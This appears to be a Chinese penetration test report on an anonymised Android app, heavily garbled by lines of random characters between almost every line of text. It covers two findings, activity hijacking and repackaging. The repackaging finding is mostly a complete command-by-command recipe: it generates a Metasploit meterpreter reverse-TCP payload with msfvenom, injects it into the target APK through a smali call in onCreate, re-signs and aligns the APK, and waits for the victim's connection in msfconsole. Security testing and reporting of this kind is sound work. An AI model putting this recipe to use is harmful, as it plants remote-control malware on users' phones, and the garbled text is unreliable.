, I; k- ?6 R4 T
( u6 t- _3 R, l% B* Q4 ~( w
表1-2 测试结果 ( m {" F* y* ]) k! D2 A
+ i" U; R. J- W. q4 m" T
0 T4 Z" u- C4 ^, y" X! V; s' @# }2 E7 N) ^" U7 F# m# [1 _
3 s, r; `9 I1 H5 ]7 `6 Z/ ]
+ W# t9 r- a, A9 k' \ 7 h9 @1 j: S# u2 _
' G+ k$ h: r* p/ r' L
) q& C& `) m' ] Y9 c- X1 m6 A, P( Y) b2 B x
1 G$ a% ~3 K4 Z0 _1 S9 H3 G# ~2 ^8 o* C. q* ^" |: t
2 检测结果 6 R' g& `; ]- d8 v4 m
% { a! V+ e0 v2 y" F' A
' U6 c. X$ A* m* K# q
7 T" e5 h2 @: {- p
1 h1 Z9 }- g" n$ e1 q: f6 k
; p( ]( A5 D9 }' [5 m 2.1 某某某 9 Z) e' x/ o5 H# N1 z, [; [
+ G# N0 C: r* d5 W% ]7 T2 E
$ _8 B3 k% m2 L5 N
: X; d% _+ V& Y+ J$ x- o
) \, [3 @0 D7 f: K. N) e, B& S1 o0 j* U. e o8 R' [
2.1.1检测目标
+ R9 u5 J. S! U8 s: L$ J
; M% W; i9 [& e9 B' j+ r
$ f% o1 _% A/ J4 P
- F: D! w% ^3 c. C( b3 v 7 g- j0 H7 ?8 S# L- T8 a
' r7 x! r7 e: O* U. E3 H 目标地址: 某某某某某某APP , W1 ]% ~6 Q# `1 j2 q2 b' |' ^: P
8 P7 _* C2 `! u P% f( Z3 O; `* o
2 `, w# H; ~1 s$ F2 n( m# H
0 I Y/ B; i y* u0 b
1 \( M0 n7 k4 X8 |( K% F
! m4 x# Q, n1 d* f 2.1.2检测结果 X; A t6 o1 j9 V0 F7 n. \
) v7 b8 e: `. ~, A: d
$ c+ w' N( O* f& o* J& z- E% D% o1 V6 v5 Q- B
1 j* U6 |, z: A. L7 C0 D: @* Y {3 W- T' A0 C5 F8 Y
2.1.2.1
1 F+ A. h: F$ P3 V$ F. b- j- \# j
/ Y% q! U* t' V
0 P; ?! b' H$ f+ a5 _( K
! b( P$ ]+ q$ m- D. k+ Y
" i% @6 M- V: E3 X" H2 W0 F8 A# a9 x" P+ m0 u9 j. u& b. j
漏洞链接地址:某某某某某某APP
4 n) k& j' \9 b2 C1 b$ Q& V/ X- V! p- j$ o' ?2 x
3 C Z. H, g3 V: `1 G& a) v6 F8 {: K) ^. i; J7 O J
/ U/ q, v. P* k
) Y5 {7 Y5 V s$ h1 h; j) ^) i* P& x
6 q+ ]3 Q) U! d+ m; \+ {0 n# ]& p" Y
% s" M0 f, Q7 H, C. O, i3 l! J. Y& i+ x- N* L( E
$ X) E z c& }8 S" Y: D/ p( i% @% d! f
m2 s. c# z8 @7 D 漏洞分析及取证: : F6 h5 \6 N- u" d9 V
! d# y: W) ~% ^' X; Y
: P2 A+ T% x2 L. ]! K( J- c7 J
* x; t, v+ ~, R, i3 T7 _1 C
4 y9 J7 y f) u; \+ D: D4 h' I1 p8 \- z( u5 D% s! u* }
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / b' U! W) Q. l, t7 k
8 w, i* ^6 a( I! O$ ^
& g& k3 |" T8 }1 A' X# U+ `, f1 m+ Z5 U, `
: D- a0 j- p$ o( [6 F7 z1 f3 ?
, y2 m9 k* O: L3 i) x
8 l4 M1 e8 n, c1 m
5 T* d# t' h9 O( d9 B
; ]) x4 O- R- G0 s/ K7 y
4 h7 Q. ]( |# c$ Q- a " P J" b$ ]+ ]2 Y( k( T0 M
/ T, Z& \! u4 A1 N
% U, R% m$ w7 P: S [) _' n- ^$ I% o7 c" l
( i. D# c+ V% j4 X: n- A/ Y) a
) `5 }5 Z4 d# \+ G : K# Y( L& M# `4 `8 R
2 Y! J9 ^ Q* D* x8 L7 j
( g9 V* g" L- x4 C8 U/ ~
8 D& o8 P# B- q* r3 X
; H1 _7 G5 F& ^( @' b3 q$ `
Z4 Q p. b p& a : U, k. f, u# h9 j9 Y6 d% R2 s: J
7 C2 R% B$ u& K2 ?
# W2 \8 O: V t2 u4 t- P+ n- C: G9 f" \) U4 i
) E. g$ U; _% ]0 G# r) ~+ t
- j) z' ^& \3 {" i* Z7 K- A% u- p D
( W, Y$ h y" X) V( h7 [
6 }0 K/ Z4 [3 y9 f6 E8 ^
7 i9 w1 g5 [1 b' |+ d: Q
- P8 e3 R$ }. i5 Y
. ~- w; }) |' f l! G' s, E
" u, h: ?1 Z9 J1 Z; c9 F2 ` 2 j: K8 T2 u0 r6 S+ B" o( L
T6 X* L8 z! N& J- G 漏洞危害:高
8 b' A- y( L' |. V) W
* z2 D) r& ]. A
! u S9 w6 c' Q0 x" I# R- ~: x4 d; J4 Y$ w+ l z4 _
6 ^3 q; e7 H$ z3 e- S' ?
3 Y+ l$ B, R5 f1 ~1 J
; C" }# m: h( ^/ V( k: I2 Z- y0 U0 p) m- x; D0 p& \( \8 W* u: \
( A- [1 k3 `3 N% n. @! X
' o, m/ G6 G& X; D( a ' e: p9 v: X' \0 e7 E- R# j: y
0 h' g% E$ G. V8 A9 f* ~
| 0 M* u- X, i! N5 J: h5 g+ z% g
* w4 ?6 v( R2 Z) \
8 b2 g _4 X/ S) x, [) f3 }3 G
; y$ g. j0 {; ?/ |, R) H9 e2 | 严重程度
2 I. a$ c8 J8 K" x# f
- C; C. @% K3 O9 b2 ?' p n8 G0 _) L- Y y3 y; O/ v. B
# j$ f& G4 Z) `+ o
| 0 V! b2 m# `2 P0 |2 {3 r
) h/ ~) [- |/ _9 f( P
3 G& j# u% n+ n" I- ^0 ~% o7 g* u/ {6 p1 Q6 W" _0 @5 K
4 _" P! c+ S$ l+ o$ S" C
$ L( w% V4 ^3 g) A! U2 {
高 8 A0 V, L+ J2 u. f% w/ ^* A) s) e
4 k D/ G+ s) Y
( j- y3 K+ L- E2 A. D. M/ G4 E6 l
8 d X+ b3 ?' }4 u' G) }6 |$ g, a( c
|
$ Q* L& c( D% h4 w% l5 U4 D1 K9 j% a0 u; J
- I& q3 Z! T. E- _" B0 K% N
% z2 U9 B* Q7 G) {5 K : Z; B) \7 r& r
" |8 C$ R7 s) Q2 T5 M% u
■
$ m z; d0 q* Y) C% K" h& ]+ t2 ^2 f9 k, y0 w7 k
2 R3 q) L% R ]9 a& ~ i. ~2 ~
& H7 v$ s C) S1 x# K; s" Z! G- q
| 6 d1 B. K( o- u) R+ l: B
3 q- X+ E0 n2 J) L- [: Y' f
5 [ \: R- K- V& X' o7 K3 g3 O% B8 z& {
$ {$ q" Z4 \' c5 j, f6 u
. |% f; H+ A, Z: f; R 中
& g. D( Y8 @3 T+ R0 P" D8 x2 c4 m5 u. E% j
& E% p; O* B/ S _( Y0 \. \4 R/ Y) @5 z9 K+ `6 x1 v; [7 Q; Y) X
|
, N9 x( G/ w( j1 m4 m; T
) \7 G2 G0 J! D 0 L- d( I M( ^. ]% o! w
, s8 ^+ W4 W1 ~: W5 x6 }/ m9 S2 l/ b * y5 w' w d( w- c
8 P) L; W6 O4 i4 u , h' I; I. S; G# w# U
9 ]0 L! u0 q8 l5 k. W3 r3 |* O $ w+ [4 R) Q8 q8 U
' B$ l5 P, x0 T1 t! O9 N- F# m V, R | - ?3 L6 ~: n% |9 B
8 { b3 ?; p, r/ [
' V4 i! j: t% g) f
+ V$ f. t- e/ l: m1 V& \; p! `; ~0 b 0 \1 x3 V8 l( E E$ B/ a
6 e! d, \& C3 q; _ q/ S! z
低 " X4 N3 o. ]7 ^- |) \' r
5 [7 v" |1 |/ }/ F/ g
6 i: i/ c q, T$ K' k, ]
/ a/ m1 x( `* G, Q
|
9 ~% Z* P. U6 C) O: ]& |; v0 _
* K: W" Z! v( ` c
[+ D2 S; Y! A/ z ( d, E6 R2 w. h' z+ n* ?: V
' a, o3 w+ V4 U. E ) M& K$ e0 @ M# @! m8 I1 D
. |% K7 g# D0 e6 d; O
+ q" q$ x A1 C* r8 G5 g% E0 n& H ~7 y$ @9 i8 u
| 9 ?9 J1 T4 f [* n
8 M- R7 \ ]1 G+ c. t
$ @3 t" V j1 S& U5 u+ c* t
+ I1 v2 \. a7 a, v1 G6 ]$ x, q . S9 w. }8 A3 i' o C' t6 `# A, ^
6 T" i5 p7 h% I {
2 C9 g- x9 u" R- \ j9 z
+ k, U0 M% p& y. r 0 ]% B4 e& s6 @0 H7 r/ \% b" N
' w+ N3 _0 w8 D
: j- H* M d/ B" f+ U" m3 J% ?% N! A% N4 _! q
& C, H; f! Q, `+ U3 q
( r# b" M9 b; @& h/ k. i3 U
* [. o& [7 N7 n e) P+ f& L
! q- d! m; j3 a3 L6 m. ~8 \
) H# ^# s* G. i
# L$ k( }3 A6 G. K 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
; x6 W! _8 ]6 c5 [9 y! J1 [' [, E# `0 } k6 t9 O
" \3 |; d. g' |, Z, @" z& f. e( ]! i1 `$ j( T
6 D2 }4 _. F& i x; M. u! e
# l. S" N& t+ p, `% E- Z, l9 Y0 S' w
2 H- |8 ?: M+ s0 i5 `/ g! D4 B) ~. y
' Z, p! i) K6 s& H
/ k& v8 `3 N, r# ?+ s2 i: n
6 L& g0 N, e9 Z
' o+ s* v! s7 F7 C6 L0 O
1 L6 t% I" O/ q& U. z) Z7 G; Y6 ]2 }# {4 F) }" u
! F1 t( w* W& t. k4 X5 \4 T
' G: `! ~8 d3 w4 G( v# |% \, A1 [( G ! T5 c3 G. c9 ^* }
- P2 k. R* Z9 s6 l+ k 2.1.2.2 - _' V5 O+ |. ^4 m; d/ k6 c$ T
6 D9 ~. N4 A s( n+ o, F
& y5 g8 m# E* F3 B9 m4 h. U5 A" I& C. `$ W
7 a& c7 T$ k6 R; Z3 Z: ]& x4 Q9 l( X( \8 j
漏洞链接地址:某某某某某某APP ; ]& s# w: v( t* S
# E2 ^5 _3 u* y1 l
: r' F3 D$ W) G( E2 W) @9 b7 z6 N$ u) d$ T% x) }7 W* p
, o, Q. P1 @- {6 v2 ^, k( b) o3 Y. w& j5 F U3 ^
漏洞分析及取证: 1 G1 U. S1 ~5 N( A
0 b: _8 _" Z* K% g0 ~
* I9 Q1 b) ^7 r* {: {3 u+ w1 r! Z
0 u( d B/ l+ ?9 ?/ T, d0 H8 D. x8 z# N. E/ g
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
& I/ ?# @1 K& M# ?/ ~4 g
( H+ W/ b( G2 Q3 x( N8 B
" \& l7 ^( A, u7 |. ~( }! C5 p7 c( B' B+ u- ^& B: G
2 w7 z2 K# Z b2 r" v( f% K8 q9 i% K. \9 U* K4 j8 d
用Metasploit 生成木马 apk # N5 @* F6 F) R' _! [
H/ {& e) j3 t
; y, u2 f) Z" z$ ]. m* \. @6 R+ \( H7 R' ^
9 y7 J& T5 k: ~9 ` C' U3 u* B; t* q; Y$ _( g2 c
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , {& ]7 O8 k) m: J( U6 u
, x. E7 {) }3 I5 Y9 Y# Y( F
! e& A4 S0 |. d. k" M
' A: O: o1 {, g6 E) A }8 u1 x& w/ R7 T$ o+ a
5 g: D3 S" }% F
反编译目标apk和木马apk
* A& Z: U/ `. q* E6 ?$ L' d! `$ Z0 w B6 a6 e) Z, c
4 K5 E9 i) S5 }7 C! G; F; b6 F, J4 D8 X8 q5 X2 b
. c# o8 E; u- ~8 v' ]" ?" M
- W( l" v3 a8 @& T3 m
apktool d target.apk
' K8 g3 S8 M j9 i g' m9 T4 {: Z1 o, J0 v& B
apktool d cockhorse.apk
' u( h) F: K* M
0 F. N; m% q* k: ]/ W
8 z4 Z! P& E0 G' H p* c# j
+ s+ Y$ c% d8 f " o# _& s I: \0 n0 y
: ^ { s0 X, _2 a0 d3 ^' {. Q2 G 木马 apk 注入目标 apk
# y2 `0 d0 d+ X5 L: j! G. G) L
. t9 k# f. N, k% Q% Z P+ }
2 K6 Y/ X$ n2 E
% K, h9 v8 ]. Y, f8 Q5 r! C" @
: i' y/ Q4 U* B6 V6 N% S- j/ k' a6 y' E1 c, G6 p u5 w
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
/ P4 |, _# U ~& d8 v. i1 G+ c% l4 Y
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
* {0 h5 o6 n" `! u8 ^! F, d1 C; o$ X# G8 [* A( D
6 P% E$ j/ ~4 K. K% d! z9 a
+ F# p! h% C: r. W* n! ^
. r5 l! j$ b4 m3 F+ L4 G. y' `* ]
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 + Z/ M. s' {& @2 D% N
. w: c/ B. D1 \4 Z
8 G& E0 w) D7 v
2 y% ?; B4 p+ e% Z' n' k! Y
* R* ` o+ s4 ]$ z( v
" L0 E# q& W1 ^+ ^ ~3 m& K8 B 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
+ k2 |) ~5 q0 V, U! ^! `3 N! z$ @; ~/ }$ Y3 K7 E" I, F5 g
+ ^) u$ I$ k% z c- C) c' ~2 L1 E c) y( W( _4 n& H/ ]
. N. G2 i; k) M
. z: x% U8 l* j+ s. e8 b
回编译生成最终 apk * T" l+ q/ h: h2 S0 \5 o0 O) S
$ q: S: D7 Q6 N" W$ N
% B' W" E% r) A6 \- g6 ]# R4 v [
( A$ f9 j* [: j, M5 t 2 |' Q: E+ F/ s# L4 k3 X
8 Y4 y# _1 W1 b( t8 a& D7 B H 重新打包
4 ]3 v. ~" U2 i) `8 A
% @( V0 @2 R1 M5 J: j
7 c1 X* r+ e# ^- y' S
, @. K y! }1 G. J' u. h
0 a6 E. P9 Y6 Z: S) h3 O
/ C2 \' v% o$ V; R6 M( r apktool b -o repackage.apk target_app_floder # v0 U6 d% H4 C9 i3 I
6 d1 d, P/ D& t) y9 w
. P% \1 E1 ~9 z: R+ e% Q# h
9 ^! r5 |/ o$ ]0 M; g7 I ?- a' E% q8 Z : A& c) q% e/ ?9 ?: p
) Z; v' D; _+ ]+ v: K+ D 创建签名文件,有的话可忽略此步骤
( r ?9 C# X b6 W
8 q' F9 J [/ ^
* Q9 G4 h/ H) `9 J# W7 P$ q1 |2 W* Y# { ~# H4 _
9 }$ i z' Z3 G7 ~
0 J4 P& v# u# j/ d% L' u keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 3 T3 V$ }2 X6 A/ S! u
. D. R3 G& Y: l% d6 N% a* M6 O! N
! T# @9 F, J( `3 F' \" a8 b3 _% g6 Y" n0 R( w) @2 o
/ r# {4 p) \& E6 b1 l
; {9 @; A7 U7 ^ 签名,以下任选其一
) z s9 l a- w; _2 {* {
; G1 P: \+ e; h9 {- H
1 a! X+ G/ Q5 Q" `% W5 ]
' F; _( d) r( [
3 L0 @, n* e( V- e
2 N! y- x$ a: r* ?) j3 {1 M jarsigner 方式
2 Y; S3 X% u1 e* X8 l3 b* y' R1 N4 w8 J# u8 {
0 k& }" i) s9 U, S: ?& ~3 ?
3 ? [+ Z1 f% M, v- ? 7 I6 p2 w0 o( f, h* l
! ^( f7 e- p8 [# ?# ]) Y jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , ~/ x5 |7 ^. r
) ?. @8 F- j) L1 i" C1 u
! g$ r+ p/ W* t
/ o3 \- o( u1 w5 B: W + k! B$ R: B3 Q1 F# O
5 }( g& P2 P# o* q4 H8 ~5 h& u
apksigner 方式 6 Q$ z$ v# O) w3 A {0 K
! u- k( `4 C9 B2 R
( M x: X, l3 o" s& E& o( F
4 w4 [' t' c6 U4 f7 T$ p
^& l1 \. y9 F }/ E5 U8 c7 [ Q% N! N
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk & r9 y$ N: K4 R$ N8 P: [% A: y
- ?$ ?( K9 V5 Q, j
# n& D9 R/ N0 s6 U. m4 m% d6 _2 A
$ h0 e6 K* n$ M
% p0 [( A+ B$ O" [# ~: ?% w( U; q
如需要禁用 v2签名 添加选项--v2-signing-enabled false , B; b, r# w) L# B) [! Y" W* W
7 _. h2 T9 j, j5 I' B+ W6 X" x
& i$ H( _" j, n5 n
: l, ~3 x6 i5 J$ M
6 k1 o2 W+ ?; y& m- X/ |0 ]# E
验证,以下任选其一 : \! X5 t$ p' D+ J
R* P' ~2 L( Z3 w# D, u, E
: k4 V7 e: \7 o+ W* z) A- x4 V- Q: ^2 [! T3 z& O1 N5 |
. v) q& R9 x1 l8 u7 G3 d
: K& k4 T* ~( v2 a& v+ G
jarsigner方式 ( \: l. o# A j
' D$ C. S R3 ?$ t4 k
( B6 {; n- W; n1 X# `/ p6 n- s
5 t a8 h; X' r6 g! W
) T7 \/ }+ _3 v8 P' h0 I
) W& x+ N2 r# F/ e jarsigner -verify repackaged.apk
; \" A% ~( W; ]/ _7 ]8 j. R
]4 x' q& w a: H
0 M8 G4 Y1 N7 g' J$ C: d
& E& Y2 p/ P# H: K5 i& v2 w
4 g9 R( h, P# [, u& b" N! L0 H. R/ b: X9 Y
apksigner 方式
9 f+ e' v d4 Q5 w' D3 U$ k" K" F @: I
1 ~2 z U0 s, ~# p# m7 p1 g. @/ |
" h& @ R0 D4 ?+ z _* M
9 V* \) ]. `+ }. `8 F apksigner verify -v --print-certs repackaged.apk 1 D; m& t5 |4 o J2 u
; h0 b! B, n% T n) W
4 |% A1 r, w+ ?5 [' G$ g
7 }- V- j! G4 u# \. F
4 v" d p/ R9 b/ O9 K5 f7 ?$ H, i4 y5 ?
keytool方式
8 U7 X8 Z0 x+ |' j1 q* z3 G/ C
, w# L, Q0 y5 g. q% n0 t6 \
) b* E3 t1 `# l7 ]) P
. E5 q' O* k& ^4 e; ^: w5 } " {2 e! z- f6 a% s. [) w
* k* z; Z) z4 F4 ?/ e keytool -printcert -jarfile repackaged.apk
7 o8 L( X8 F' R/ }/ S* K
8 E: o- D$ x6 Q1 x+ [
) P* Q# J% {+ q6 P
# T2 f" m4 o# @0 c/ M/ N# y* u3 S ! b1 \$ t$ r8 Y6 e3 m/ a% D
9 H- s4 O) [0 v4 r( e) w
对齐
B$ O; [" }! I+ S: X; b0 q) Y. f8 [! }& a
& ]' x+ d3 J! ` I
* \6 W8 }- X+ f A4 V
) b+ U2 ]3 h# A$ k
' y5 {( z. K* x. Q0 d% ?
字节对齐优化
+ d6 M" m9 C7 z D
+ ^2 d$ R. @3 g6 s+ {
' {+ L; Y" K- F8 ^& o& S( O
- B" `+ T. J$ I* _1 T
# R. ~0 D. k5 H; ^$ y; s/ G* o2 h* Z9 y/ \; |
zipalign -v 4 repackaged.apk final.apk
: g) X! v8 r+ O0 C8 g2 N( h
1 g# W0 c0 j# a
. Y, \- B* {; w
l8 R0 W$ D! s4 B4 Y
2 g1 x: u* m" o
3 v5 \+ d2 m- }4 r" o0 A+ b3 C 检查是否对齐 5 s' `8 Z) v' Z ]0 W, n$ E
) ^6 H$ d& |9 X) q2 J- Q7 I9 j
9 s1 s2 x @5 v( ^$ k+ U
$ K; [. E! E3 \ B6 G% T+ t " S6 P0 U3 I# N9 G6 e" h
9 T6 t9 @- S5 o5 u
zipalign -c -v 4 final.apk : T8 Y/ P: {3 } {3 q9 l
+ S) A0 w2 C6 x& s F
6 q- R3 I8 g7 c+ q$ T
1 L$ P: R/ u3 J% p) f
& j1 u9 E1 Q* ]! M. ?/ W9 Y6 x
) P4 s) m6 y: z 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ! H5 S, l2 V0 a+ t1 U
$ ?! X5 F' x, L# T+ O% Z/ S! w5 T/ G
7 g% D6 d, {8 {1 T
: J, p( s9 a1 G# Z4 H) {- w/ `
+ H; X6 `' c) U* {: k
3 l4 W0 B& u3 c e! z6 r3 F 启动Metasploit控制台,配置参数等待上线 + a( |4 |* I4 I" v' }
& C( D( ^, W8 F5 b# a
. A4 c) R: \+ {3 e
$ d$ x) n7 \! r& l, A. v ; t( q8 `& J- {' S& Y9 J$ P
, A9 u% z O. ]( @
在终端依次输入如下命令
5 F" }% A, o7 S- Z, c( y, E: r* B7 V" X/ q8 b, `( W9 @6 ]
, b7 w& T4 U7 v7 L q% K" }8 o
& E* W. C0 M7 h6 w: ]- W) _ / M j* D( z; I
; I) b- V% ^& C+ j5 x
msfconsole
9 G3 |% `4 e4 r$ w9 X9 r" k
- V- D J/ L8 H6 \# C
5 h5 b) Z4 ?5 y/ q& D! ` E% R" m4 s
( l9 X6 [/ D6 X/ G7 s
! g* G* k3 L2 D) N f
% W1 \' M' \! u7 C E use exploit/multi/handler 3 d) q0 k1 V& s! b& j$ U( O
# a2 T$ ]1 a7 |+ ^ G# t
2 q- f0 e0 T/ m, {# T3 w8 x; E) B. ^# w6 d- P# U
- Y1 q# }9 n5 O' ~# ?6 v
3 S6 v( {- Z8 Y: Z, U
set PAYLOAD android/meterpreter/reverse_tcp ' H- I# T4 S3 K9 Q
* B7 ?- _( g/ P4 m/ n& f
; M6 _+ w+ @4 x) T: V: N5 s1 J( l. V+ ?. D
/ Q5 I% X6 T! c
1 _7 l0 m! U/ m1 I
set LHOST 192.xxx.xx.xx
/ l7 W3 f G* y6 b6 r* T
# c/ E# S6 O: J# K2 Q
+ E" {5 T' ?9 Z9 [ x3 r4 P
/ i H: r, P @/ w5 Q ' A! G } ^: ?4 H" B2 V
4 D# Z: j3 u7 M Y* @7 k set LPORT 4444 1 u: c7 `: J! V5 Y
1 n! q2 F4 n8 R* w$ J
; t, f. V8 F' {- q4 M3 y
( |. w% u1 w3 v- x2 V% U% r' O+ x' j 3 `. k6 i0 r( F: s f
9 c ?) n* A5 @* x) [
exploit ' X" C/ z" n3 ?/ r8 `8 X
" }& F6 _/ B$ T C; T# Z6 ~) Z* z
4 M. e5 y( d' n% F7 g9 _: @5 Q
$ Q. w1 `5 F' P% K
+ i1 f5 Y3 u) a% k5 c ?3 P- Q7 W: l, K
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
f* u+ v0 }3 {' F4 ?9 L
1 `2 n0 ?0 z" O6 H
# W6 u' \0 o6 N0 T/ J6 @3 [9 r- t: U. i* p! r) w7 A }
3 ^0 y0 ~9 C; m2 c: a8 f5 I
1 W/ I: m' t4 s6 G4 x2 c, j 漏洞危害:中 ) L; x( \, c: S* |& m
# W. b! r8 o o, C
2 @3 \$ ?% D K! I8 N% ^1 D' {- W
! V0 ]4 n6 ?9 }0 \* S/ L0 z
, A: X) |- x( f5 r% J4 n R7 c9 B6 i& `* Q4 E' D
; e% n1 z9 y1 J' R, w
& r7 { @( r! j S E, H
) g4 {8 I7 ]6 I5 k; f8 v
% W7 b$ @- X5 v3 ]' I
) \8 E# Y: A! h4 Y: h$ o. V3 ^! {
* q) m+ e1 |+ z% o: R
% h. m' C* {+ b- I) Q3 _3 I8 y5 ? Z6 S, H& H# T* Q7 D
| : q" y- P9 d! d/ {5 ?
5 ~8 d5 l; {2 `( G- b% X) d9 H$ r . G! R; {. J$ f; h4 {( Y' {- U
# ?4 m! S0 L# a2 ?# ^3 g
严重程度 2 m7 d0 G0 y* Q9 ]5 Q/ l8 t
7 n# S: K- m6 d1 ~5 E8 A " u# \; }" m% ~* l! ~
; n5 T" s1 d9 k
|
4 h1 R7 b! I2 {
- G" |2 N7 r( J8 c% B! B' u! Z& E 5 f$ c- O8 K" C; y6 [$ a) a* u
$ W) X& J" A/ g1 A+ A" e8 u* C4 D* ?
8 s& }/ s* M$ h; F% Z5 T/ T
5 E5 j1 |) |9 f9 b/ ] 高 ! c- J! o+ Y* d- X+ b3 g5 `/ H
/ f$ }, n2 ^& y6 d- s) I& b4 a 8 C I) e6 H; _% \* P# W( a5 W
! d, T( {# Y t4 {3 e& g& A3 F' L( s |
' l! X+ G+ C2 x4 z* q9 D8 G: r4 Z1 Z @7 W4 o" T- W p7 R- e( e
% o# v) C @0 C# d/ y0 ?! p! K
H; l7 C$ E! H/ c! b1 w. o7 _ / @' B! x o. V: m/ J% l+ @; ^ }
# ?4 ]) M1 J! d ■
: r# O, `# J! |, R( S" }) Y
8 Y# g' i( ` {+ r' s' l
0 s, N" N$ m% X3 x. h8 V/ G- T- a4 q# X, b
|
0 F, d W% h. S; _6 e
! v& B% ^9 D- N/ b: r( S" n3 @
7 U: x$ c; C2 ^5 p/ y! H
! n ?, X' c7 k
2 V) z" M# X/ G% }. e6 C) H8 v" `" }- N( u8 R
中 / X2 q8 ?' `2 {3 X$ C
6 V5 y$ {) x4 i4 ?& I1 \2 v 9 v& ]" _2 c+ q) [# C9 ~# @
; J1 N' O! y2 y( w/ W
|
5 t7 N2 o9 d! c. O+ a X! M, E$ s' ` ^1 U* i3 p- `! I
. L. V; M4 ~7 }" h/ e
' G6 h" T$ T) T7 w% G7 H( q/ ~
8 ^! q6 K2 J, u8 S
9 L# O/ e0 u0 t& A9 B: w , X; K( I( e4 w. y7 b1 j$ k& y2 ?
& B* c% v, G; [; D2 c " H. b+ ^& I' D
& t. N0 `: ~- n+ E0 _/ Z0 b
5 [$ S. |5 i6 |- K# W: u( C# X# p. U8 w4 ?! ~8 H% X: s/ A
| * S8 D; C( V0 X6 G) f: ]+ _6 n: l
1 d- k2 N$ z( M& @# h' R7 [
2 n7 q1 F3 ?7 V" o- g
2 d" M- I/ y5 j8 v1 S0 j
4 |4 Y; F" i7 u! S1 A8 Q; ?% `: U- }; i2 t
低 * R9 Y4 X5 W/ Q$ v! D
' V" _: }& P( x6 f
! n) n7 M! W; P- x9 `8 H( N* d. t- |# X8 e5 F- P; R# x
| $ v, s% \5 @* {9 r) l
9 f Z0 w7 B3 s9 V- V0 z' Z9 o
, s5 T; H7 `/ C
9 l2 u1 ~, D% G. L Z+ k& O
5 f+ c. Q h8 U; F+ ]4 V9 u
) _4 g; s7 V) e- c' z0 @ ' i7 K9 z% p% H9 {
3 ? \, v; _8 V1 g, b$ b$ o
) o9 G1 C' a" p
" f# O8 X" ~: c8 ?7 P " m# N" Z* v7 H; ~
; G ?7 L- S4 o! X+ d | % N7 x( F" v+ A4 M7 `9 D
/ V" y- W! |& @- }, y0 G$ t
4 r, K* M% h2 C6 W; P8 j
' l( B( m0 f) ^+ |& I7 B( w 0 N# q3 X0 J$ d4 O3 e
/ b" D1 Y' H0 g0 R
* q" C. H9 ^5 f p; f0 H
5 c4 [+ g. V2 g& |! d
0 C" V" O6 N, p. U( m- M5 a; h, q4 N }1 V
) \6 W' y9 E8 O& ]
) g5 n$ ^1 C o3 i3 s9 n; g k
4 w0 Z6 j9 R4 G- O" C) `: x1 S) W6 ^! d( y- ]
3 e( L8 W0 n- N! g/ N2 ]5 B+ {
0 I* U0 M7 ^0 i6 X) a* ]8 V1 @5 k
5 x3 l( u( V" a: N% ^
% q d* F& {+ Z8 S% g7 O6 M( v 修复方法: + _) A7 c) X0 x4 ^# H5 f7 S
" X. l. T0 z4 `9 `
% \7 i- v3 H- k: o0 O5 m
Z/ E6 D4 [; g! ~8 M
% E1 S; I p- K: D- a$ W- u: |
! m o U$ ^* ^0 i/ m5 X8 b 1.在 APP 启动时应做签名校验防止二次打包。
V+ h! p5 h( _( D/ V4 o( u2 @' z! E }7 E5 R0 B& ` Q
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , @$ a' e7 Y7 A5 N- F
! ?1 v- c6 n* v, y0 N
" G7 _$ r2 e% G9 ^
- i. y% V0 c5 g; a/ h1 A$ l) w( `
4 N4 n6 n1 b/ A; V
2 h6 e9 k7 Y) Q5 y- l6 P 0 k+ }3 f- X2 a* D/ i3 k
6 j! J+ D& X" @: S2 g % W$ c! D2 \; h$ g& o0 n- U
1 v/ V- b4 s5 f3 F D( `4 e3 {
7 |8 Y9 B# M$ W% A; B; B; e
( k( f5 H3 O& S: {, e- ~
0 M3 m9 H. j6 Q$ a5 ?3 _! L4 f: O% R& H; t0 U
A9 |% b+ ~& C/ Z3 L9 Y" T( A- g' m8 L/ q3 T) L8 H7 D
3 r( _' Z8 |7 p5 u" f* l
) Y* p! l0 L* C3 F$ y
1 Q3 L" s3 d1 O
$ R- R8 M; r h9 G4 q3 P